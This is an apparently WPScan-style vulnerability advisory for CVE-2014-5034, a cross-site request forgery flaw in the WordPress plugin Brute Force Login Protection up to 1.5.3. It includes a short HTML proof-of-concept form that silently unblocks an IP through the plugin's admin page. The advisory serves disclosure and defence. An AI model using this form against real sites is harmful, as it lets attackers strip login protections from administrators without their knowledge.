Brute Force Login Protection <= 1.5.3 – Arbitrary IP Removal/Add via CSRF | CVE 2014-5034 | Plugin Vulnerabilities

Description

The plugin is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability that could allow an unauthenticated attacker to add or remove arbitrary IP addresses from the block, allow lists. For a successful attack, a privileged authenticated WordPress user would need to visit a page the attack controls, for the CSRF attack to be executed.

Proof of Concept

<html>
	<title>CSRF Brute Force Login Protection exploit</title>
	<form name="csrf" action="https://server/wp-admin/options-general.php?page=brute-force-login-protection" method="post">
		<input type="hidden" name="IP" value="127.0.0.1" />
		<input type="submit" name="unblock" value="Unblock" class="button" />
	</form>
</html>

Affects Plugins

brute-force-login-protection

No known fix

References

CVE

URL

https://github.com/0pc0deFR/Exploits/blob/master/CVE-2014-5034/exploit.html

URL

https://github.com/0pc0deFR/wordpress-sploit-framework/blob/master/exploits/Brute_Force_Login_Protection_1_3_Cross_Site_Request_Forgery

URL

http://www.giphy.com/gifs/uocXxoUHzEf1PfMctO

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Verified

Yes

WPVDB ID

c736713a-3a40-4652-ad56-33c412240588

Timeline

Publicly Published

2014-07-26 (about 11 years ago)

Added

2022-04-19 (about 4 years ago)

Last Updated

2022-04-20 (about 4 years ago)

Other

Published

Title

Published

2014-08-27

Title

Quick Post Widget 1.9.1 - Multiple Function CSRF

Published

2024-07-11

Title

Event post < 5.9.11 - Post Metadata Update via CSRF

Published

2025-03-27

Title

ValidateCertify < 1.6.2 - Cross-Site Request Forgery

Published

2025-03-27

Title

Anthologize < 0.8.3 - Cross-Site Request Forgery

Published

2024-06-21

Title

Book Landing Page < 1.2.4 - Cross-Site Request Forgery to Notice Dismissal